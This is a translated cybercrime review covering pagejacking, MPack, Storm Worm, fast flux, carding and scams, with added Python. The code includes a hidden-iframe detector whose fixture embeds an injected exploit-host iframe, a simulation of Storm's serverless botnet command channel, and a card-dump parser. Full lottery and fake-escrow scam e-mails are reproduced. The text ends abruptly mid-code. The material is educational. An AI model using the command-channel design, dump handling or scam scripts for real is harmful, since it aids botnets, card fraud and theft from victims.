An IFRAME (inline frame) is an HTML element that embeds, inside a Web page, a frame containing local or remote HTML content. Among its attributes are: src, the source of the content to be loaded in the frame; name, the name of the frame, used to target links at it; scrolling, which allows or forbids scrolling in the window; as well as all the options for managing the frame, such as its visibility, width, height, position on the page, margins, etc.

Example: (slide illustration not reproduced)

IFRAME: pagejacking

The preliminary phase of the attack involves searching for and compromising vulnerable sites. In a great number of cases, these sites run applications developed in PHP.

Even if the IFRAME is "hidden", it does its job by taking the user's browser to the remote page. If that page contains an exploit (or even just a script), it may be executed if the computer that loads it is vulnerable (or has loose security settings).

Attacks have been numerous and effective: ANI, MS06-044, MS06-006, MS06-014, ActiveX bugs and other XML overflows.

Example: (slide illustration not reproduced)

Hidden IFRAME, social networking sites (screenshot not reproduced)

"Hidden" IFrames? (screenshot not reproduced)
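The hidden-IFRAME pattern above in working form, as an added example that is not from the CLUSIF deck or from any tool it names: the script scans a page for iframes that are both concealed (1x1 or zero size, display:none, visibility:hidden, or pushed off-screen) and sourced from a host other than the page's own, which is exactly the shape of an injected pagejacking tag. The sample page, its hosts (*.example.invalid) and the size and CSS heuristics are constructed assumptions for the example.

```python
"""Find 'hidden' IFRAMEs of the kind injected for pagejacking.

Added example, not code from the CLUSIF deck or from any tool it names. The sample page and
its hosts (*.example.invalid) are constructed; the size and CSS heuristics are assumptions.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed page: a normal video iframe plus two concealed ones loading from other hosts.
SAMPLE_PAGE = """<html><head><title>Welcome</title></head><body>
<h1>Company news</h1>
<iframe src="http://exploit.example.invalid/in.php" width="1" height="1"
        style="visibility:hidden"></iframe>
<iframe src="/player.html" name="video" width="640" height="480"></iframe>
<iframe src="http://ads.example.invalid/banner" style="display:none"></iframe>
</body></html>"""

# CSS that keeps a frame out of sight while the browser still fetches and renders it.
HIDDEN_CSS = re.compile(
    r"display\s*:\s*none|visibility\s*:\s*hidden|position\s*:\s*absolute.*?(?:left|top)\s*:\s*-\d",
    re.I | re.S,
)


def _dimension(value):
    """Leading integer of a width/height attribute ('1', '0px'); None if absent or non-numeric."""
    m = re.match(r"\s*(\d+)", value or "")
    return int(m.group(1)) if m else None


class IframeCollector(HTMLParser):
    """Collect the attribute dict of every <iframe> start tag."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            self.iframes.append({k.lower(): (v or "") for k, v in attrs})


def hidden_reasons(attrs):
    """Why an iframe looks concealed; an empty list means it is visible."""
    reasons = []
    w, h = _dimension(attrs.get("width")), _dimension(attrs.get("height"))
    if (w is not None and w <= 1) or (h is not None and h <= 1):
        reasons.append("tiny or zero size")
    if HIDDEN_CSS.search(attrs.get("style", "")):
        reasons.append("hidden by CSS")
    return reasons


def find_suspicious_iframes(html, page_host):
    """(src, reasons) for every iframe that is concealed and loads from a host other than page_host."""
    collector = IframeCollector()
    collector.feed(html)
    findings = []
    for attrs in collector.iframes:
        src = attrs.get("src", "")
        host = urlparse(src).hostname
        reasons = hidden_reasons(attrs)
        if reasons and host and host.lower() != page_host.lower():
            findings.append((src, reasons))
    return findings


if __name__ == "__main__":
    for src, why in find_suspicious_iframes(SAMPLE_PAGE, "www.example.invalid"):
        print(src, "->", ", ".join(why))
```

Same-host hidden frames are deliberately left alone here, because the point of the technique is the jump to a remote exploit host; a scan of a real site would also have to resolve protocol-relative and JavaScript-built src values, which a static parser does not see.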

Spring 07: Italian Job/MPack

Premeditated attack: between mid-April and mid-June 2007, a significant number of Web servers were compromised (probably through a common flaw in Apache or IIS, or an ISP configuration error).

In June, over 10,000 sites were affected, 80% of them in Italy. More than 80,000 computers were infected as a result.

Once users visit a compromised decoy site, they are silently redirected (via an IFRAME) to a Web server hosting the PHP page of a tool known as MPack.

Various attacks exploiting security flaws in the victim's browser are chained together (Internet Explorer, etc.).

Client-side attacks (diagram not reproduced)

Source: http://www.honeynet.org/papers/wek

MPack

- Commercial "hacking" tool
- Developed and maintained by a Russian group
- Between $700 and $1,000, support included…
- Simple and efficient… (a collection of PHP scripts)

Source: securityfocus.org

Behind the IFrame: MPack

1. A malicious person with the MPack kit configures it and implants on his or her Web server the PHP page that launches the exploits and the various associated modules.
2. He or she compromises several servers and inserts decoy IFrame HTML tags that direct the user to the attack page.
3. MPack is configured to silently drop several programs on any vulnerable machine that connects to it.

The first program tries to infiltrate the Web pages accessible from the victim's computer and turn them into decoys as well, extending MPack's range of action. The other programs are generally droppers that install the malicious programs the attacker wants to use (bot, keylogger, password stealer, etc.). The tool is coupled with a MySQL database that lets the attacker follow the progress of the attack.

(Diagram labels: legitimate sites made into decoys; MPack C&C center; before the attack; botnet, RockPhish, fast-flux, DDoS, identity theft, …)

IFrame & MPack: the attack

1. The victim visits a legitimate site that has been made into a decoy…
2. …and is silently redirected to the MPack host server.
3. Depending on the browser, several vulnerabilities are tested. Various programs are downloaded and executed.
4. The Web pages accessible from the victim's computer are in turn made into decoys.

(Diagram labels: (1) connection to a legitimate site; (2) silent redirection; (3) exploitation; (4) machine under control, HTML infection; outcomes: botnet, RockPhish, fast-flux, DDoS, identity theft, …)

Behind the IFrame: the case of Italy ("Italian Job"/MPack) (figures not reproduced)

Source: Websense
Source: Symantec

A recent version of MPack (screenshot not reproduced)

Same technique, different tools

- IcePack: tool similar to MPack, uses the same exploits; developed administration interface; marketed for about $400
- n404: used against the Bank of India site (August 31, 2007)
- NeoSploit: used against the Monster.com site on November 19, 2007 (Eddie Bauer, GMAC Mortgage, BestBuy, Toyota Financial and Tri Counties Bank)

Storm Worm

Several names: Storm Worm, Zhelatin, Peacomm. First appearance in January 2007.

Characteristics:
- Targets Windows systems
- Spreads by e-mail, inviting the user to connect to a site that exploits a flaw and offers attractive programs (social engineering)
- Innovation: P2P control channel

Objective: botnet, illegal activities, spam…

Classic botnet (IRC)

(Diagram: the bot master sends commands to an IRC C&C server; the vulnerable user is compromised through an exploit and downloads the bot; the bot performs a DNS lookup of the C&C name on a DNS server and connects to the botnet.)

Storm Worm: P2P botnet (diagram not reproduced)

Click me… (many incentives to get infected…) (screenshots not reproduced)

P2P network over Overnet/eDonkey

The dynamic growth of the network makes it difficult to control or block the botnet.

Binary code analysis

- Protected binary: 2 layers of encryption that vary with almost every binary
- Detection of virtual machines and anti-sandbox protection
- Multi-threaded code, programmed in C++: a noticeable rise in the sophistication of malware programmers. C++ clearly complicates the reverser's task, as does multithreading (mostly because of the Windows API)
- Modular code (communication layer separated from the control layer)

The bot uses the Overnet P2P protocol, based on the Kademlia specification.
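To make concrete why a Kademlia-style control channel leaves no single server to block, here is an added example, not Storm code and not from the deck: a toy Overnet-like overlay with one k-bucket per bit of XOR distance, an iterative FIND_N
ODE lookup, and a rendezvous key both sides derive from a segment label and a date. The peer identifiers, the key derivation scheme, the bucket size K and the command strings are all constructed for this illustration; Storm's real key schedule is not reproduced here.

```python
"""A Kademlia-style rendezvous, the mechanism behind Storm's Overnet control channel in outline.

Added example with constructed peers; it is not Storm code and not from the deck. The bot master
publishes a command under a key that every bot can compute for itself (here from a segment label
and a date, a scheme assumed for the example), and each bot retrieves it from whichever of the
K closest peers are still alive. No address, domain or server needs to be fixed in the binary.
"""
import hashlib

K = 4       # replication factor and k-bucket size (small so the example stays readable)
ALPHA = 3   # how many peers a lookup queries per round


def ident(label):
    """Deterministic 128-bit identifier for a constructed peer or key (Overnet IDs are 128-bit)."""
    return int.from_bytes(hashlib.sha256(label.encode()).digest()[:16], "big")


class Overlay:
    """Toy overlay: each peer keeps up to K contacts per bit of XOR distance, as Kademlia does."""

    def __init__(self, peer_ids):
        self.peers = set(peer_ids)
        self.storage = {p: {} for p in self.peers}
        self.contacts = {}
        for p in self.peers:
            buckets = {}
            for q in sorted(self.peers - {p}):
                bucket = buckets.setdefault((p ^ q).bit_length(), [])
                if len(bucket) < K:
                    bucket.append(q)
            self.contacts[p] = {q for bucket in buckets.values() for q in bucket}

    def remove_peer(self, p):
        """A takedown or sinkhole: the peer stops answering; stale entries stay in others' tables."""
        self.peers.discard(p)
        self.storage.pop(p, None)

    def find_node(self, key, bootstrap):
        """Iterative FIND_NODE: converge on the K live peers XOR-closest to key."""
        shortlist, queried = {bootstrap}, set()
        while True:
            alive = [p for p in shortlist if p in self.peers]
            closest = sorted(alive, key=lambda p: p ^ key)[:K]
            to_query = [p for p in closest if p not in queried][:ALPHA]
            if not to_query:
                return closest
            for p in to_query:
                queried.add(p)
                shortlist |= self.contacts[p]   # learn the contacts p answers with

    def publish(self, key, value, bootstrap):
        """Store value on the K peers closest to key; returns those peers."""
        holders = self.find_node(key, bootstrap)
        for p in holders:
            self.storage[p][key] = value
        return holders

    def lookup(self, key, bootstrap):
        """What a bot does: search for the key and ask the closest live peers for its value."""
        for p in self.find_node(key, bootstrap):
            if key in self.storage[p]:
                return self.storage[p][key]
        return None


def rendezvous_key(segment, day):
    """Key both sides compute without any server; a different segment gives a disjoint channel."""
    return ident(f"{segment}:{day}")


def build_demo(n_peers=48):
    """Constructed overlay of n_peers bots with deterministic identifiers."""
    return Overlay(ident(f"bot-{i}") for i in range(n_peers))


if __name__ == "__main__":
    net = build_demo()
    peers = sorted(net.peers)
    key = rendezvous_key("segment-A", "2008-01-17")
    holders = net.publish(key, "send spam template 7", peers[0])
    print("command replicated on", len(holders), "peers")
    net.remove_peer(holders[0])                     # take down the single closest holder
    boot = next(p for p in peers if p not in holders)
    print("a bot bootstrapping elsewhere still reads:", net.lookup(key, boot))
```

Publishing stores the command on the K peers closest to the key; a bot computing the same key from any live bootstrap peer converges on those same peers, so taking down one holder changes nothing for the others. A different segment label yields a different key and a disjoint channel, which is the shape of the "botnet splitting" described later; the defender's generic answer is to join the overlay as peers and observe or poison it, not to block addresses.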

Reverse proxy (diagram not reproduced)

Important characteristics

- Botnet designers are becoming increasingly professional
- Modular design
- Distributed and resilient control channel, blended into a legitimate network
- Botnet splitting: possibility of selling or renting pieces of the botnet, using encryption keys derived from hashes
- Possibility of providing a turnkey spam service by selling or renting access to control servers
- Large variety of binaries: long and repetitive analysis, difficult to create signatures

The answer to

A specific answer is doomed to failure:
- Binary signatures are impossible: new variants almost daily, single-use Web pages
- End-to-end encryption of communications
- Distributed control channel
- Strong authentication for the control channel
- Polymorphic and effective code protection

A generic approach is necessary.

Fast flux

- Multiple IP addresses assigned to a single Fully Qualified Domain Name (FQDN: host name plus domain name)
- Often associated with reverse proxies
- Used for cybercrime
- Simple (single) flux: the "A" records (IP addresses) of the FQDN change constantly (very short TTL)
- Double flux: the "A" and "NS" (name server) records both change constantly

(Single-flux diagram: the bot master regularly updates the records of the spam.net zone at its authoritative DNS server (IP no.1, IP no.2, etc.). The user's local DNS server asks for the IP of www.spam.net and receives an answer with TTL=0. The user's Web request for www.spam.net reaches an infected PC acting as proxy 1 (IP no.1) or proxy 2 (IP no.2), which redirects it to the bot master's real server.)

(Double-flux diagram: as above, but the name servers ns1 and ns2 of spam.net are themselves infected PCs (NS 1, NS 2), and the bot master updates the NS records of the zone as well as the A records; the IP request for spam.net is answered with TTL=0 by whichever infected NS is current.)

Fast flux example: thebestcasinosonly.org (A records, class B diversity, NS servers, TTL values; table not reproduced)

Source: Honeynet Project - http://www.honeynet.org/

Fast flux example: IPs mapped to thebestcasinosonly.org: 287 IP addresses, 60 different AS numbers

Source: Honeynet Project - http://www.honeynet.org/
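As an added example, not Honeynet Project code and not from the deck, here is a small analysis over repeated resolver answers for one name that computes the measures the Honeynet table above lists (A records, class B diversity, NS servers, TTL values) and separates single flux from double flux. The three series of snapshots are constructed and use documentation and private address ranges; the thresholds are assumptions. In real use the snapshots would come from re-querying the name every few minutes, and the /16 count would be replaced by an AS lookup.

```python
"""Flag single and double fast-flux behaviour from repeated DNS answers.

Added example on constructed resolver snapshots; it is not Honeynet Project code.
In practice the snapshots come from re-querying the same name every few minutes;
the IPs below are documentation and private ranges chosen only to show /16 spread.
"""
from dataclasses import dataclass, field
from ipaddress import ip_address


@dataclass
class Snapshot:
    when: int                 # seconds since the first query
    a_records: list           # IPs answered for the FQDN
    ttl: int                  # TTL of the A answer
    ns_records: list          # NS names of the zone
    ns_ips: list = field(default_factory=list)   # IPs the NS names resolved to


def class_b_diversity(ips):
    """Distinct /16 prefixes: fluxing bots sit in many consumer networks, a CDN in a few blocks."""
    return len({int(ip_address(ip)) >> 16 for ip in ips})


def _changes(snapshots, getter):
    """Count consecutive snapshots whose record set changed."""
    return sum(1 for x, y in zip(snapshots, snapshots[1:]) if set(getter(x)) != set(getter(y)))


def analyse(snapshots, short_ttl=300, min_class_b=3, min_changes=2):
    """Return the metrics and a verdict: 'double', 'single' or 'none'.

    Thresholds are assumptions for this example, not figures from the deck.
    """
    all_a = {ip for s in snapshots for ip in s.a_records}
    all_ns_ips = {ip for s in snapshots for ip in s.ns_ips}
    metrics = {
        "distinct_a": len(all_a),
        "a_class_b": class_b_diversity(all_a),
        "a_changes": _changes(snapshots, lambda s: s.a_records),
        "ns_changes": _changes(snapshots, lambda s: s.ns_records + s.ns_ips),
        "ns_class_b": class_b_diversity(all_ns_ips),
        "max_ttl": max(s.ttl for s in snapshots),
    }
    single = (metrics["max_ttl"] <= short_ttl
              and metrics["a_changes"] >= min_changes
              and metrics["a_class_b"] >= min_class_b)
    double = (single
              and metrics["ns_changes"] >= min_changes
              and metrics["ns_class_b"] >= min_class_b)
    metrics["verdict"] = "double" if double else "single" if single else "none"
    return metrics


# Constructed observations (spam.invalid is a placeholder zone, not a real domain).
NS = ["ns1.spam.invalid", "ns2.spam.invalid"]

SINGLE_FLUX = [   # A records rotate across unrelated networks; name servers stay put
    Snapshot(0,   ["192.0.2.10", "198.51.100.20"], 0, NS, ["203.0.113.1", "203.0.113.2"]),
    Snapshot(300, ["203.0.113.30", "10.1.2.3"],     0, NS, ["203.0.113.1", "203.0.113.2"]),
    Snapshot(600, ["10.9.8.7", "192.0.2.11"],       0, NS, ["203.0.113.1", "203.0.113.2"]),
]
DOUBLE_FLUX = [   # the name servers themselves are infected PCs and rotate too
    Snapshot(0,   ["192.0.2.10", "198.51.100.20"], 0, NS, ["192.0.2.50", "198.51.100.60"]),
    Snapshot(300, ["203.0.113.30", "10.1.2.3"],     0, NS, ["203.0.113.70", "10.1.2.80"]),
    Snapshot(600, ["10.9.8.7", "192.0.2.11"],       0, NS, ["10.9.8.90", "192.0.2.51"]),
]
LOW_TTL_CDN = [   # legitimate: short TTL and rotating answers, but all inside one provider /16
    Snapshot(0,   ["192.0.2.100", "192.0.2.101"], 60, NS, ["192.0.2.1"]),
    Snapshot(300, ["192.0.2.102", "192.0.2.103"], 60, NS, ["192.0.2.1"]),
    Snapshot(600, ["192.0.2.100", "192.0.2.104"], 60, NS, ["192.0.2.1"]),
]

if __name__ == "__main__":
    for name, series in (("single", SINGLE_FLUX), ("double", DOUBLE_FLUX), ("cdn", LOW_TTL_CDN)):
        print(name, analyse(series))
```

The legitimate low-TTL series is the caveat a practitioner needs: short TTLs and rotating answers alone also describe a content delivery network. What marks a flux network is the spread of the answers across unrelated networks, and for double flux the same spread in the name servers themselves.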

Domain tasting

- DNS domains are billed by the registrar only after 5 days, a practice originally meant to allow "errors" (typos, etc.) to be corrected
- This practice is frequently abused: "domain tasting" is used to obtain several domain names free of charge for a few days (phishing, etc.)

Some statistics (chart not reproduced)

Source: ICANN, Nick Ashton-Hart

The Russian Business Network (RBN)… still active

A Russian ISP, based in St. Petersburg, known for its questionable activities.

According to Wikipedia: pornography, counterfeiting, malware and phishing…

Russian Business Network, October 2007: an empire…

1 million sites, several million IP addresses available, and 4 million visitors a month.

- Several sites selling fake security products (anti-virus, anti-spyware, codecs)
- Sites selling malware, specialized forums (contacts, sales, purchases)
- Sites offering money for questionable activities (iFramer)
- Several decoy sites reached through IFrames (with exploits, MPack), mirror sites (RockPhish), relay sites for self-replicating malware (W32/Nuwar), etc.
- Collector (phishing) and administrator (botnet) sites
- Adult sites (XXX) and child pornography sites

Source: VeriSign

RBN… and Storm Worm 2008…

Domain names and creation dates:
- MERRYCHRISTMASDUDE.COM, created Nov 27, 2007
- UHAVEPOSTCARD.COM, created Dec 23, 2007
- HAPPYCARDS2008.COM, created Dec 26, 2007
Registered through "ANO REGIONAL NETWORK INFORMATION CENTER DBA RU (Russia)"

Source: rbnexploit.blogspot.com

Webography

- MPack, the Italian Job: http://www.vnunet.fr/fr/news/2007/06/20/l-attaque-italian-job-se-r-pand
- Another malware pulls an Italian job: http://blog.trendmicro.com/another-malware-pulls-an-italian-job/
- Websense alert: MPack: http://www.websense.com/securitylabs/alerts/alert.php?AlertID=782
- Italy Under Attack: Mpack Gang Strikes Again!: http://www.symantec.com/enterprise/security_response/weblog/2007/06/italy_under_attack_mpack_gang.html
- Know your Enemy: Fast-flux Service Networks: http://www.honeynet.org/papers/ff/
- Know your Enemy: Malicious Web Servers: http://www.honeynet.org/papers/mws/
- Exposing Stormworm: http://noh.ucsd.edu/~bmenrigh/exposing_storm.ppt
- Russian Business Network: http://rbnexploit.blogspot.com/
- Russian Business Network study (David Bizeul): http://www.bizeul.org/files/RBN_study.pdf
- Security Intelligence Webcast Replays (Uncovering Online Fraud Rings: The Russian Business Network; Cyber Espionage: China and the Network Crack Program): http://www.verisign.com/security-intelligence-service/info-center/webcasts/archived/index.html
- CERT-IST analysis: 2007 review: http://www.cert-ist.com

Acknowledgments: François Paget (McAfee) and Eric Edelstein (Orange) for providing information and materials


The most obvious signs of cybercrime: carding, skimming, Internet scams

Fabien LANG, Deputy chief of the OCLCTIC, National Criminal Investigation Directorate

Carding: a globalized market for thieves

Bank card vocabulary: types, number, cardholder, validity, cryptogram, dump, CVV2, BIN

Definition: generally, carding refers to bank card fraud using various hardware, software or subversive means to obtain and resell bank card data, with the intent of making fraudulent purchases at the expense of the legitimate cardholder.

3 stages:
- Coding: data theft
- Vending: resale of data
- Cashing: financial transactions

Coding (carders): automatic number generators, data bank hacking, spyware and Trojan horses.

Vending (vendors): purchase and resale of credit card numbers, magnetic strips, cardholder information, cryptograms.

Cashing (cashers) = swindling and money laundering circuits: real purchases (Internet, by phone, in stores…), generating virtual purchase transactions, cash withdrawals and financial transactions.
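To make the vocabulary concrete, an added example that is not OCLCTIC material and not from the deck: it parses track 2 "dumps" of the kind traded at the vending stage into PAN, BIN, validity and service code, runs the Luhn check that any "automatic number generator" has to satisfy, and masks the PAN for anything that gets logged. The records are constructed from published industry test card numbers; the track 2 layout follows ISO/IEC 7813, and the century in the expiry date is an assumption.

```python
"""Parse a magnetic-stripe track 2 "dump" and triage the PAN it carries.

Added example on constructed records built from published industry test card numbers;
it is not OCLCTIC material. Track 2 layout (ISO/IEC 7813): ';' start sentinel, PAN of
up to 19 digits, '=' field separator, YYMM expiry, 3-digit service code, discretionary
data, '?' end sentinel. The LRC that follows the end sentinel is not modelled here.
"""
import re

TRACK2 = re.compile(r"^;(?P<pan>\d{12,19})=(?P<exp>\d{4})(?P<svc>\d{3})(?P<disc>\d*)\?$")


def luhn_ok(pan):
    """Luhn check digit test, the only validation a 'number generator' has to satisfy."""
    total = 0
    for i, ch in enumerate(reversed(pan)):
        d = int(ch)
        if i % 2 == 1:                      # every second digit from the right is doubled
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0


def mask_pan(pan):
    """BIN and last four only: what should appear in any log or ticket."""
    return pan[:6] + "*" * (len(pan) - 10) + pan[-4:]


def parse_track2(dump):
    """Split a dump into its fields; returns None if the record is malformed."""
    m = TRACK2.match(dump.strip())
    if not m:
        return None
    pan, exp, svc = m.group("pan"), m.group("exp"), m.group("svc")
    return {
        "pan_masked": mask_pan(pan),
        "bin": pan[:6],                       # issuer identification number
        "expiry": f"20{exp[:2]}-{exp[2:]}",   # YYMM -> YYYY-MM (century assumed)
        "service_code": svc,
        "chip_card": svc[0] in "26",          # first digit 2 or 6: an IC (chip) card
        "luhn_ok": luhn_ok(pan),
    }


def triage(dumps):
    """Count how many records in a seized list are usable, Luhn-invalid or malformed."""
    counts = {"valid": 0, "luhn_fail": 0, "malformed": 0}
    for d in dumps:
        rec = parse_track2(d)
        if rec is None:
            counts["malformed"] += 1
        elif rec["luhn_ok"]:
            counts["valid"] += 1
        else:
            counts["luhn_fail"] += 1
    return counts


# Constructed records using well-known test PANs (4111..., 5555...), never real cards.
SAMPLE_DUMPS = [
    ";4111111111111111=08121011234567890?",
    ";5555555555554444=09062010000000000?",
    ";4111111111111112=0801101?",          # one digit off: fails Luhn
    "4111111111111111=0812101?",           # missing start sentinel: malformed
]

if __name__ == "__main__":
    for d in SAMPLE_DUMPS:
        print(parse_track2(d))
    print(triage(SAMPLE_DUMPS))
```

A Luhn-valid number is necessary but nowhere near sufficient for fraud: the issuer still checks expiry, the service code and, for card-not-present use, the CVV2, which is why the vending stage trades cryptograms and cardholder details alongside the number. Anyone handling seized dumps should work from the masked form and keep full PANs out of reports and tickets.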

Cashing, or the swindling and laundering circuit: all the methods used to collect money from accounts, and to use and launder the transferred amounts; use of financial channels to pay off the suppliers of bank data.
- Setting up virtual companies that sell fake products for real money
- Purchases of goods and products in genuine online stores
- Purchases of goods and products in physical stores
- Western Union, E-gold, WebMoney

Illustration

- CardSystems case in the USA in 2005: 70,000 numbers stolen and used
- TJX case in the USA in 2007: 45 million numbers stolen

Illustration

- Identification of French citizens engaged in the trade of credit card numbers in 2007
- Ties established with other individuals in Canada, the United Kingdom, Russia and the USA
- Sale of numbers on confidential forums
- Use of alternative means of payment: Western Union, E-Gold and WebMoney
- Losses due to the activities of the French individuals estimated at $2 million

Skimming: a European-scale crime

- Crime essentially committed from Eastern Europe
- Appearance of groups from the French suburbs
- Hierarchical and structured groups

ATM tampering

- Skimmer: reads the magnetic strip
- False keypad: captures the confidential code (PIN)
- Video system: films the confidential code (PIN)

(Photos of ATM tampering devices, including 2 micro-cameras, not reproduced)

Internet scams: the reign of mystification

Internet scams

- An increasingly common trend
- Prevention is essential
- New stakes for international cooperation

CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 140

[Scam “certificate” reproduced on the slide; the words “Certificat BILL GATES Fondation” repeat as a watermark across the whole page. Recovered text, translated from French:]

We certify that the sum of Fifty Thousand Euros (50,000) awarded to MR BONNEFOI JEAN YVES, winner of the international lottery ‘VIVE L’ENFANCE’ of the organisation COMPASSION INTERNATIONALE, is a donation from THE BILL GATES FOUNDATION.

THE CONTEXT IMPLIES

(1) THAT THE SAID FUNDS DO NOT COME FROM THE SALE OF HARD DRUGS, THAT IS TO SAY COCAINE, HEROIN, OPIUM OR OTHER RELATED DRUGS (MEDICINES).

(2) THE FUNDS MENTIONED ABOVE ARE NOT THE PROCEEDS OF MONEY LAUNDERING, NOR CAN THEY BE CONSIDERED THE PROCEEDS OF ECONOMIC SABOTAGE.

Consequently, MAITRE BOHUI ADRIEN, principal of the LAW OFFICE OF MAITRE BOHUI ADRIEN in Abidjan, recognises MR BONNEFOI JEAN YVES as the beneficial owner of these funds worth Fifty Thousand Euros (50,000 euros) and hereby declares that the information mentioned above is correct, in compliance with the rules in force.

The Law Office of Maître BOHUI ADRIEN holds itself responsible for the accuracy of the information mentioned above.

This Certificate is signed jointly by THE BILL GATES FOUNDATION and COMPASSION INTERNATIONALE, represented respectively by Mrs ISABELLE CHEVALIER and Mr ANDRE DUSSELIER, under the supervision of MAITRE BOHUI ADRIEN for the Ministry of Justice.

BILL GATES FONDATION
DIRECTOR OF OPERATIONS
ISABELE CHEVALIER

From: euromillions euromillions
To: [email protected]
Sent: Saturday, November 24, 2007 10:06 PM
Subject: WINNER E-LOTTERY

Ref: 10205 Group: 12/25/0360 Representative code: 03

NOTIFICATION:

We are pleased to inform you of the draw of the English Euro Millions lottery programme, held on 01 November 2007 in London. Your e-mail address, attached to ticket number 69475600545-721 with serial number 8867/04, drew the winning numbers 31-6-26-13-35-7, which subsequently entitled you to win in the 2nd category.

You have therefore been drawn to receive a total sum of 1.500.00€ (One hundred and fifty thousand Euros) in cash, credited to file KPC/9080118308/02. The total jackpot of €100 million was shared among the first fifty (50) lucky winners in this category.

Please note that your winning numbers are included in the list of our representative agents in Europe, as indicated on the game coupon. Consequently, your prize of 1.500.00 € (One hundred and fifty thousand Euros) will be paid to you by our banking subsidiary in London. Our agent will begin the process to facilitate the release of your funds as soon as you contact him.

All participants were chosen at random over the Internet by a computerised draw system. This promotion takes place annually. For security reasons, we advise you to keep your winning information confidential until your file has been processed and your money has been transferred (sent) to you in the manner you consider appropriate. This is part of the precautionary measures to avoid cases of double claims of winnings and abuse of this programme by a few unscrupulous elements. Be warned.

Do not reply to our broadcast sponsor.

To take possession of your prize, please send a copy of your valid identity card or passport (scanned, as an attachment, in order to receive your winning ticket) and contact only the French-speaking winners’ representative with the information above for the processing and updating of your file.

Agent: CARLOS ALBIN. Contact only our agent for all information.

Contact Agent

SURNAME AND FIRST NAMES: CARLOS ALBIN e-mail: [email protected] or [email protected]

PROCEDURE

Upon receipt of this congratulatory e-mail

1- Be aware that without an update of your new financial situation we cannot transfer your winnings; that said, the accredited bailiff will be solely in charge of all your legal and administrative documents

2- A copy of your valid identity card or passport by e-mail (scanned, as an attachment, in order to receive your)

3- The full address of your place of residence (geographical address, telephone, fax, profession)

The agent will then introduce you to the bailiff. To avoid unnecessary delays and complications, please quote your reference/group numbers in all your communications with the designated agent.

To avoid unnecessary delays and complications, please quote your reference/group numbers in all your communications with us or our designated agent. Please accept the congratulations of all the staff of this programme.

Thank you for participating in our promotional lottery programme.

The access code will remain valid for 3 days, so you will have plenty of time to share the benefit with your friends and family.

NB: We act in accordance with worldwide rules against money laundering, terrorism, human rights violations and the financing of rebellion.

We certify that no sum of money will be withdrawn from your winnings until you are in full possession of your winnings.

IMPORTANT: This e-mail complies with the legislation in force and with the position of the CNIL of 17 February 2005 on prospecting by electronic mail in a professional context (CNIL: échos des séances 02/03/2005). In accordance with article 34 of law 78-17 of 6 January 1978 on information technology, files and civil liberties, you have a right of access to and rectification of personal data concerning you.

Access our website: http://gagner-euromillions.levillage.org/euromillions/loterie-anglais-euromillions.htm

CARLOS ALBIN, International Coordinator of the English Lottery


Dear Sir,

I am the first owner of the car. The car is in good condition, no problems. I see from your e-mail that you are interested in the condition of the car, so you should know that the car is 100% working and looks very good, no dents or bumps, no scratches or any kind of damage, no flooding or destruction, no engine problems; the interior does not look big, it is in new condition because I took care of it and loved it. I bought the car in France and I still have the French registration documents. I live in Rome, Italy, and I have the car here with me. I can deliver the car to you. E-mail me if you want to buy the car. The immediate purchase price is 5500 euros. Shipping costs are included in the price! I have some family problems and I urgently need money, which is why the price is so low. I have decided that the payment should be made using eBay security. I want to take this opportunity to assure you that this deal is 100% legitimate. I have decided that the payment be made using eBay security because I want to take this opportunity to assure you that this deal is 100% LEGITIMATE. Your money will be held by eBay until you receive the car and send them confirmation that you are satisfied with the product received. In case you do not want to keep the car, all you have to do is ask them for a refund and you will be fully refunded within 5 days. I hope I have told you everything you need to know, and I will continue to look for other possible buyers until you inform me that you want to go ahead with the deal. You should know that if you decide to buy the car I will need your full name and shipping address (including your eBay name) as soon as possible in order to send your details to eBay and start the transaction.

PS: sorry for the bad French. I am using translation software to translate my messages.

Regards,

Brandi Carpenter

eBay sent this message to a registered eBay member.

Your registered name is included to show that this message came from eBay. Here is the purchase protection for your item transaction: 1975 Cobra Cabriolet
The seller has sent us the following documents:
- registration certificate
- certificate of no lien
- customs clearance certificate
- European certificate of conformity
- service book
- purchase invoice
- identity card
- passport

Our company’s privacy policy forbids us from sending you the documents. Our Legal Department experts have received and verified the seller’s documents. According to our experts you can buy the car without risk. Our experts’ opinions are based on their extensive knowledge. We can guarantee you that:
- the car has not had any accident.
- the seller is the owner of the car.
- the car is not pledged as security.
- the car has passed the technical inspection. The car has no mechanical defects.
- the car can be registered in France without any problem.

For security reasons you will not make the payment directly to the seller. You will make the payment to our local agent in Italy, Mrs Olivia Tunder. The seller has agreed to pay the fees for this transaction. Instead of 5500 euros you may send our agent only 5200 euros. After you have sent the payment to our agent we will instruct the seller to send you your purchased item. After you receive and examine your purchased item, if you agree, our agent will release the money to the seller.

Here are the instructions for making the payment:

1) Locate the nearest Western Union office (at the Post Office). To locate a Western Union office, click here.

2) Make the payment in cash (5200 euros) to our agent.

Here are the name and address of our agent:
NAME: Olivia Tunder
STREET: 94 Via Torre Rossa
CITY: Rome 00165
COUNTRY: Italy

3) Send us copies of the payment receipts by fax at 08-2667-5976.

Make sure you have set your fax to high quality. When you make the payment at Western Union, please remember to follow these simple rules:

1) Write your full address (street, city, country, telephone number) on the Western Union receipt.

2) You are not allowed to write anything about eBay on the Western Union receipt. This is considered “disguised advertising” and is strictly forbidden by Western Union.

Your transaction with the seller has been automatically insured by our company against purchases; your money will be refunded. We, eBay France, officially declare that we take full responsibility for the security and confidentiality of this transaction. Do not reply to this e-mail, as your reply will not be received.

Copyright © 2007 eBay Inc. All rights reserved. The trademarks and brands mentioned belong to their respective owners. eBay and the eBay logo are registered trademarks of eBay Inc.
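The three exhibits above (lottery notification, private car offer, fake eBay escrow) share recognisable traits; the following added example, written for this page and not taken from the CLUSIF deck, scores a message against those traits from a mail-filtering point of view. The indicator list, weights, tiers and the short sample texts are constructed for the illustration (the samples paraphrase the exhibits in English), not the original messages.

```python
"""Rule-based triage of advance-fee and fake-escrow e-mails (added example, not CLUSIF code)."""
import re
from dataclasses import dataclass, field


@dataclass(frozen=True)
class Indicator:
    name: str
    pattern: str  # regex, applied to whitespace-normalised lower-case text
    weight: int


# Traits taken from the scam exhibits; the weights are a constructed choice for this example.
INDICATORS = (
    Indicator("prize_notification", r"\b(lottery|jackpot|winning numbers|you have won)\b", 3),
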